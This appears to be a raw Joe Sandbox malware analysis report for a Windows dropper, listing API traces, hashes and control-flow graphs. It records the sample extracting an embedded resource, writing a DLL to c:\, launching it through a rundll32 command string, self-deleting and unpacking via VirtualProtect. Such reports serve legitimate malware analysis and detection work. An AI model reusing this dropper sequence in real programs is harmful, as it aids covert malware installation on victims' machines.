                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: AllocByteCharClearMultiStringVariantWidelstrlen
                                                • String ID: NULL
                                                • API String ID: 3257503732-324932091
                                                • Opcode ID: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
                                                • Instruction ID: d48dc8f015bb9ad4e3fe3b606f75ade0cd382acbba87cbd38ab65ded183ca584
                                                • Opcode Fuzzy Hash: 2c32c68fdb7f477cd471d25b524953c9b06913d1421e61b9c9fbc39c3ea53eac
                                                • Instruction Fuzzy Hash: 9801D272600616ABC7105F52CD84B5BBBB8EF413A4F108136FE04B7390E3B898018BE9
                                                Function 004010C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 369 4010c0-401101 GetTickCount srand rand 370 401103 369->370 371 401105-401109 369->371 370->371 372 401131-401139 371->372 373 40110b-40110c 371->373 374 401110-401125 rand 373->374 374->374 375 401127-401130 374->375
                                                APIs
                                                Strings
                                                • ekimhuqcroanflvzgdjtxypswb, xrefs: 004010CB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: rand$CountTicksrand
                                                • String ID: ekimhuqcroanflvzgdjtxypswb
                                                • API String ID: 3923125369-3762667353
                                                • Opcode ID: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
                                                • Instruction ID: b437bbb5ddae58e17e7d4b32f079fbf535bad8d5f4727950ce3f72a2bcf890de
                                                • Opcode Fuzzy Hash: af64965fe20426d731e7306a6c52b6f3676ca0dad364db7fcac0bb6fbcf8137a
                                                • Instruction Fuzzy Hash: 34F04436B052004BC204AA2D9D40A6FF797EBC8351F85043EFE89E3352C976980846BA
                                                Function 00403B10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 149fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: fclosefopenfprintf
                                                • String ID: user.ini
                                                • API String ID: 167258513-1338118170
                                                • Opcode ID: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
                                                • Instruction ID: 013291e13a0706baa31a3bd6034cca8677a8dde525ade2333a9cb0047f89d752
                                                • Opcode Fuzzy Hash: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
                                                • Instruction Fuzzy Hash: 2C51D7716483809BD310EB15C845F9BBBE4AFD5718F04096EFA85732C1DB7DA504CA6B
                                                Function 00403060 Relevance: 6.2, APIs: 4, Instructions: 176COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: ClearFreeStringVariant
                                                • String ID:
                                                • API String ID: 1438600931-0
                                                • Opcode ID: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
                                                • Instruction ID: 37251e203aaafb338411583485349c6a70529d6897f4196c911f470311200aa0
                                                • Opcode Fuzzy Hash: 36ddf7c9e64948429ea50c594583730548552646f732539940beb09dbb1102c1
                                                • Instruction Fuzzy Hash: 8D6110B46083818FC300DFA8C884A1AFBE8BF89704F508D6EF89597350C779E949CB56
                                                Function 004036D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00403762
                                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 00403896
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: user.ini
                                                • API String ID: 3850602802-1338118170
                                                • Opcode ID: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
                                                • Instruction ID: 54062048f7d8e9c3c5b10c10d2f13be0a112b8bce1456f32d0f06b7dcf1a2bd7
                                                • Opcode Fuzzy Hash: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
                                                • Instruction Fuzzy Hash: 8151C6F1508341AFC314EB22C856F5F7BE8ABD5B48F004A2DF655662C1DB789608CBA7
                                                Function 00402170 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 167windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402202
                                                • SendMessageA.USER32(?,00000143,00000000,?), ref: 00402336
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1687793114.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1687780454.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687807484.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_otsIBG7J9b.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: user.ini
                                                • API String ID: 3850602802-1338118170
                                                • Opcode ID: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
                                                • Instruction ID: afaa56c09f8307c61a21e81d60edd19e1058136c3d77b862272b9fbdbc9fbc74
                                                • Opcode Fuzzy Hash: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
                                                • Instruction Fuzzy Hash: 9E51E9B1508341AFC304EB62C856F5F7BE8ABD5748F400A2DFA55662C1DB789608CBA7

                                                Execution Graph

                                                Execution Coverage:9.4%
                                                Dynamic/Decrypted Code Coverage:3.3%
                                                Signature Coverage:0%
                                                Total number of Nodes:183
                                                Total number of Limit Nodes:5
                                                execution_graph 1505 401080 1510 401090 1505->1510 1507 401085 1513 404390 1507->1513 1511 401020 1510->1511 1512 40102a __p___argv DeleteFileA 1511->1512 1512->1507 1516 404364 1513->1516 1515 4010aa 1517 404379 __dllonexit 1516->1517 1518 40436d _onexit 1516->1518 1517->1515 1518->1515 1594 402440 SendMessageA 1595 40247d 1594->1595 1598 402850 CoInitialize 1595->1598 1597 402566 1599 40287e 1598->1599 1603 402910 1599->1603 1601 4028e0 CoUninitialize 1602 4028f9 1601->1602 1602->1597 1604 402ea7 1603->1604 1621 402941 1603->1621 1604->1601 1605 40297b SysFreeString 1605->1604 1607 402a10 VariantClear VariantClear 1607->1621 1608 402b0a VariantClear VariantClear 1608->1621 1609 402b76 VariantClear VariantClear VariantClear 1609->1621 1610 402be2 VariantClear VariantClear VariantClear 1610->1621 1611 402c48 VariantClear VariantClear VariantClear 1611->1621 1612 402c7b lstrlenW 1612->1621 1613 402c97 WideCharToMultiByte 1613->1621 1614 402cc2 lstrlenW 1614->1621 1615 402cfb lstrlenW 1615->1621 1616 402cd8 WideCharToMultiByte 1616->1621 1617 402d11 WideCharToMultiByte 1617->1621 1618 402d43 _mbsicmp 1618->1621 1619 402f00 VariantClear lstrlen MultiByteToWideChar SysAllocString 1619->1621 1620 402e34 VariantClear VariantClear VariantClear 1620->1621 1621->1605 1621->1607 1621->1608 1621->1609 1621->1610 1621->1611 1621->1612 1621->1613 1621->1614 1621->1615 1621->1616 1621->1617 1621->1618 1621->1619 1621->1620 1622 402e26 VariantClear 1621->1622 1622->1621 1623 401c60 1624 4041a8 1623->1624 1625 401c7f GetSystemMenu 1624->1625 1627 401c91 1625->1627 1626 401cf5 SendMessageA SendMessageA 1628 401d3d 1626->1628 1627->1626 1629 401ce4 1627->1629 1630 401cbe AppendMenuA AppendMenuA 1627->1630 1629->1626 1630->1629 1641 402ee0 SysFreeString 1650 401f00 CoInitialize 1651 401f36 1650->1651 1652 401f65 _mbscmp 1651->1652 1653 401f86 1652->1653 1654 401ff9 1653->1654 1655 401f8a 1653->1655 1657 402005 _mbscmp 1654->1657 1665 403060 1655->1665 1659 402020 1657->1659 1658 401f94 1661 402063 CoUninitialize 1658->1661 1659->1658 1660 402030 _mbscmp 1659->1660 1660->1658 1662 40207a 1661->1662 1664 40209e 1662->1664 1674 403260 1662->1674 1666 4030f7 1665->1666 1667 40308a 1665->1667 1666->1658 1668 4030b5 SysFreeString 1667->1668 1673 40310c 1667->1673 1668->1666 1670 403227 SysFreeString 1670->1658 1672 403188 VariantClear VariantClear 1672->1673 1673->1670 1673->1672 1675 403289 1674->1675 1678 4032b1 1675->1678 1681 403410 MultiByteToWideChar SysAllocStringLen 1675->1681 1678->1664 1680 4033bf 1680->1664 1682 403440 MultiByteToWideChar 1681->1682 1683 403386 SysFreeString 1681->1683 1682->1683 1683->1680 1699 403d20 1700 404328 1699->1700 1701 403d45 _mbscmp 1700->1701 1702 403d66 1701->1702 1703 403d8a 1701->1703 1704 403e2d fopen 1703->1704 1706 403df2 1703->1706 1705 403e46 fprintf fclose 1704->1705 1704->1706 1705->1706 1710 401de0 IsIconic 1711 401df8 1710->1711 1712 401e8a 1710->1712 1713 401e04 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 1711->1713 1714 401e83 1713->1714 1631 403461 EnableWindow 1573 415f67 1574 415f76 1573->1574 1575 415fd3 VirtualFree 1574->1575 1576 415ffb 1575->1576 1577 416143 VirtualProtect 1576->1577 1578 416162 1576->1578 1577->1577 1577->1578 1579 4043ec __set_app_type __p__fmode __p__commode 1580 40445b 1579->1580 1581 404463 __setusermatherr 1580->1581 1582 40446f 1580->1582 1581->1582 1591 40455c _controlfp 1582->1591 1584 404474 _initterm __getmainargs _initterm 1585 4044c8 GetStartupInfoA 1584->1585 1587 4044fc GetModuleHandleA 1585->1587 1592 404578 1587->1592 1590 404520 exit _XcptFilter 1591->1584 1593 40458d 1592->1593 1593->1590 1519 401690 1520 4016b5 1519->1520 1521 4016bf __p___argv 1520->1521 1522 4016d3 1521->1522 1523 4016ce 1521->1523 1531 4013d0 FindResourceA 1522->1531 1541 401220 1523->1541 1526 4016d8 1527 4016e4 1526->1527 1528 4016dc ExitProcess 1526->1528 1556 4019c0 1527->1556 1530 4016ef 1532 4013f0 1531->1532 1533 4013f9 LoadResource 1531->1533 1532->1526 1534 401411 SizeofResource LockResource 1533->1534 1535 401408 1533->1535 1536 401455 1534->1536 1535->1526 1559 4010c0 GetTickCount srand rand 1536->1559 1538 4014f7 wsprintfA CreateDirectoryA Sleep 1539 4010c0 4 API calls 1538->1539 1540 40154a 7 API calls 1539->1540 1540->1526 1542 40415a 1541->1542 1543 401234 __p___argv 1542->1543 1564 401140 1543->1564 1545 401260 1546 40128d 1545->1546 1547 40126f __p___argv 1545->1547 1549 4010c0 4 API calls 1546->1549 1548 401140 3 API calls 1547->1548 1550 401281 Sleep 1548->1550 1551 4012ca GetTickCount wsprintfA CreateFileA 1549->1551 1550->1546 1550->1547 1552 40415a 1551->1552 1553 401318 Sleep WriteFile Sleep WriteFile CloseHandle 1552->1553 1554 40135c 1553->1554 1555 401362 __p___argv wsprintfA WinExec Sleep ExitProcess 1554->1555 1557 4019ec 1556->1557 1558 401b3f LoadIconA 1557->1558 1558->1530 1561 401103 1559->1561 1560 401131 1560->1538 1561->1560 1562 401110 rand 1561->1562 1562->1562 1563 401127 1562->1563 1563->1538 1571 4043b0 1564->1571 1567 401193 ReadFile 1570 4011fc CloseHandle 1567->1570 1568 401188 1568->1545 1570->1545 1572 40114a CreateFileA 1571->1572 1572->1567 1572->1568 1642 402ef0 VariantClear 1644 402170 1645 40219e 1644->1645 1646 4021ec SendMessageA 1645->1646 1648 40220a 1646->1648 1647 402342 1648->1647 1649 402323 SendMessageA 1648->1649 1649->1648 1684 402710 1686 402796 1684->1686 1687 40272a 1684->1687 1685 40280d 1686->1685 1689 4027c1 SendMessageA SendMessageA 1686->1689 1687->1686 1688 40274a SendMessageA SendMessageA 1687->1688 1690 404334 1688->1690 1691 404334 1689->1691 1692 402776 SendMessageA SendMessageA 1690->1692 1693 4027ed SendMessageA SendMessageA 1691->1693 1692->1686 1693->1685 1694 403b10 1696 403b39 1694->1696 1695 403c7f 1696->1695 1697 403c66 fopen 1696->1697 1697->1695 1698 403cad fprintf fclose 1697->1698 1698->1695 1708 4039d0 SendMessageA 1709 403a0d 1708->1709 1715 4045b9 1716 4045be 1715->1716 1719 404590 1716->1719 1720 404595 1719->1720 1721 4045b3 1720->1721 1722 4045aa _setmbcp 1720->1722 1722->1721 1632 40101b 1633 401020 1632->1633 1634 40102a __p___argv DeleteFileA 1633->1634 1707 40453e _exit

                                                Executed Functions

                                                Function 004013D0 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 216COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,00000086,HTM), ref: 004013E4
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 004013FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoad
                                                • String ID: %s "%s",init %s$%s\%s.dll$D$HTM$WinSta0\Default$c:\%s$c:\windows\system32\rundll32.exe
                                                • API String ID: 2619053042-2457680838
                                                • Opcode ID: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
                                                • Instruction ID: 5c017b3d947436da3a79cbd575b5788da6cc5bd4b656b3589a3b64b7cb9d4a99
                                                • Opcode Fuzzy Hash: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
                                                • Instruction Fuzzy Hash: DA71E5716083806FD3218B24CC45BEB7BD5EB89704F00492DF6C9AB2D1DAB995098B9B
                                                Function 004043EC Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                • String ID:
                                                • API String ID: 801014965-0
                                                • Opcode ID: 06df12e95e92e3eb90a3e8b97be51bae533ac44a46cc44ada275256ec1e1c751
                                                • Instruction ID: b84817577bdd794c3584b55ee7e6e144752272faa3ca625d9eeea178d453bb24
                                                • Opcode Fuzzy Hash: 06df12e95e92e3eb90a3e8b97be51bae533ac44a46cc44ada275256ec1e1c751
                                                • Instruction Fuzzy Hash: BB416AB1C04748AFDB20DFA4DD45A6A7BB8EB49714B20027EE651B72E1D7385840CF69
                                                Function 00415F67 Relevance: 3.2, APIs: 2, Instructions: 200memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 38 415f67-415f82 call 416213 41 415f84-415f8c 38->41 42 415f8e-415f95 38->42 43 415fa4-415fbe 41->43 44 415f98-415f9b 42->44 49 415fc5-415fcc 43->49 45 415fd3-415ff9 VirtualFree 44->45 46 415f9d-415fa1 44->46 47 415ffb-415ffe 45->47 48 41603a-41604b call 416169 45->48 46->43 51 416000-416002 47->51 57 416051-416056 48->57 58 4160d2-4160e5 48->58 49->45 50 415fce-415fd1 49->50 50->44 51->47 53 416004-41600a 51->53 55 416020-416028 53->55 56 41600c-416010 53->56 60 41602a-416038 55->60 56->47 59 416012-41601e 56->59 57->58 63 416058-41606b 57->63 61 4160e7-416100 58->61 62 416129-416138 58->62 59->60 60->48 60->51 73 4162b2-4162ba 61->73 74 416106-416122 61->74 64 416162-416163 62->64 65 41613a-416141 62->65 66 416077-41607c 63->66 67 41606d-416075 63->67 64->73 69 416143-416160 VirtualProtect 65->69 68 41607f-416086 66->68 67->68 71 4160a8-4160b1 68->71 72 416088-41608a 68->72 69->64 69->69 71->58 77 4160b3-4160b6 71->77 75 416092-41609f 72->75 76 41608c-416090 72->76 74->62 75->76 78 4160a1-4160a6 75->78 76->68 79 4160c0-4160c2 77->79 80 4160b8-4160be 77->80 78->76 82 4160c5-4160c8 79->82 80->77 82->58 83 4160ca-4160d0 82->83 83->82
                                                APIs
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00415FE0
                                                • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,?), ref: 00416153
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Virtual$FreeProtect
                                                • String ID:
                                                • API String ID: 2581862158-0
                                                • Opcode ID: af8375059041f43eb7b739a3b30046c93744f04c90da5dd6509c3269b4ceb1ad
                                                • Instruction ID: b5095fd7398c27d52b9b4c2b60e65f433afccfdda2a0a88fef6c4a84fe82fa18
                                                • Opcode Fuzzy Hash: af8375059041f43eb7b739a3b30046c93744f04c90da5dd6509c3269b4ceb1ad
                                                • Instruction Fuzzy Hash: 4D6119326002109FDB25CA14CC847E6BB75EF89314F29449AD5899B381D379EDC2CB55
                                                Function 00401690 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • __p___argv.MSVCRT ref: 004016BF
                                                • ExitProcess.KERNEL32 ref: 004016DE
                                                  • Part of subcall function 00401220: __p___argv.MSVCRT ref: 00401253
                                                  • Part of subcall function 00401220: __p___argv.MSVCRT ref: 00401274
                                                  • Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401286
                                                  • Part of subcall function 00401220: GetTickCount.KERNEL32 ref: 004012CD
                                                  • Part of subcall function 00401220: wsprintfA.USER32 ref: 004012EA
                                                  • Part of subcall function 00401220: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
                                                  • Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401321
                                                  • Part of subcall function 00401220: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401331
                                                  • Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401339
                                                  • Part of subcall function 004019C0: LoadIconA.USER32(00000000,00000080), ref: 00401B40
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Sleep__p___argv$File$CountCreateExitIconLoadProcessTickWritewsprintf
                                                • String ID:
                                                • API String ID: 2567926744-0
                                                • Opcode ID: c799f09f8497bed147593227bf029dd3053d6bb179ea20caa85db19ddaaaa527
                                                • Instruction ID: 616903a36303fad059cf54e446dff4fbed7c69b0abb077ef7505e4f2811fcf63
                                                • Opcode Fuzzy Hash: c799f09f8497bed147593227bf029dd3053d6bb179ea20caa85db19ddaaaa527
                                                • Instruction Fuzzy Hash: 55315D740093C19AD334FB65C65DBDFBBE0AFE5308F04096EA58D162C2DB785548CA67
                                                Function 0040101B Relevance: 3.0, APIs: 2, Instructions: 18fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 126 40101b-401045 call 404148 __p___argv DeleteFileA
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: DeleteFile__p___argv
                                                • String ID:
                                                • API String ID: 2264924877-0
                                                • Opcode ID: bf514f4f8b3450d371abe8fd2ec50fab2b8f3e662778c779333cc8a1cf4ff616
                                                • Instruction ID: 361f11c7750a6d85eff9a8f0da96cb1417f6188351d19e92d2bb50a9746f2348
                                                • Opcode Fuzzy Hash: bf514f4f8b3450d371abe8fd2ec50fab2b8f3e662778c779333cc8a1cf4ff616
                                                • Instruction Fuzzy Hash: 6DD0C9792106119FC7247F58E91DA4A7BA4EF89302B4540AAFA01AB3A1CBB498408F94
                                                Function 00401090 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 130 401090-401095 call 404148 __p___argv DeleteFileA
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: DeleteFile__p___argv
                                                • String ID:
                                                • API String ID: 2264924877-0
                                                • Opcode ID: 13b2291c2e5dbe36a149c3bb4d038d92b622d1ebf9b1753679f4a678d6a4a091
                                                • Instruction ID: 9c20f3d3dba36466ad4554863c02a9e62d6e2a013dcf2d6c67c330d6723d64da
                                                • Opcode Fuzzy Hash: 13b2291c2e5dbe36a149c3bb4d038d92b622d1ebf9b1753679f4a678d6a4a091
                                                • Instruction Fuzzy Hash: F4D05E382047108FC3146B54E918A5A76A0EB88301B0540BAFA02AB3E0CAB498409F9A
                                                Function 004B05A9 Relevance: 2.6, APIs: 2, Instructions: 76memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004B0625
                                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 004B0658
                                                Memory Dump Source
                                                • Source File: 00000004.00000003.1694804932.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_3_4b0000_ufcpp.jbxd
                                                Similarity
                                                • API ID: Virtual$AllocFree
                                                • String ID:
                                                • API String ID: 2087232378-0
                                                • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction ID: 62f81f45cd68e50e9bd05ac8982592f4b3b786d72f475be6bb4b65f4be7c2a13
                                                • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
                                                • Instruction Fuzzy Hash: 4A213831A00219BFDB108F64CC40BEFFBF5FB55395F608163E910A2280E7788A119B64

                                                Non-executed Functions

                                                Function 00401DE0 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • IsIconic.USER32(?), ref: 00401DEA
                                                • SendMessageA.USER32(?,00000027,?,00000000), ref: 00401E1B
                                                • GetSystemMetrics.USER32(0000000B), ref: 00401E29
                                                • GetSystemMetrics.USER32(0000000C), ref: 00401E2F
                                                • GetClientRect.USER32(?,?), ref: 00401E3C
                                                • DrawIcon.USER32(?,?,?,?), ref: 00401E74
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.1697520062.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.1697471266.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697546696.0000000000405000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ufcpp.jbxd
                                                Similarity
                                                • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                • String ID:
                                                • API String ID: 2166663075-0
                                                • Opcode ID: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
                                                • Instruction ID: db773ba51d367e258aaa0001d282ccedd816923d488996b04dffdd7d1b0f9207
                                                • Opcode Fuzzy Hash: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
                                                • Instruction Fuzzy Hash: 62117CB12047029BC214DF79DD89D6BB7E9FFC8304F084A2DB58AD3290DA34E905CB59
                                                Function 00401220 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 136sleepfileprocessCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • __p___argv.MSVCRT ref: 00401253
                                                  • Part of subcall function 00401140: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040117B
                                                • __p___argv.MSVCRT ref: 00401274
                                                  • Part of subcall function 00401140: ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 004011C2
                                                  • Part of subcall function 00401140: CloseHandle.KERNEL32(00000000), ref: 004011FD
                                                • Sleep.KERNEL32(00000064), ref: 00401286
                                                • GetTickCount.KERNEL32 ref: 004012CD
                                                • wsprintfA.USER32 ref: 004012EA
